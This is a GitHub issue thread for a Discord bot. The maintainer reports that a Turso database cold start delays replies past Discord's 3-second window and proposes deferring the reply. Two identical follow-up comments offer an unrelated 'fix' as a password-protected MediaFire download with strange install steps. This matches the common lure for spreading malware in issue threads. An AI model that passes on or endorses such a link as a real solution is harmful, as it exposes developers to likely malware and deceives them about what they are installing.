### ISSUE TITLE
Turso cold start issue

### ISSUE THREAD

**Issue by jack3898** [jack3898/osu-crew-bot#11]
When turso enters a cold start when the bot needs to access the db, the bot may not respond in to satisfy the 3 second initial window for a response

Should make it so the discord bot defers the reply so discord understands the message is acknowledged and gives us a 15 minute window instead which is much more forgiving

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
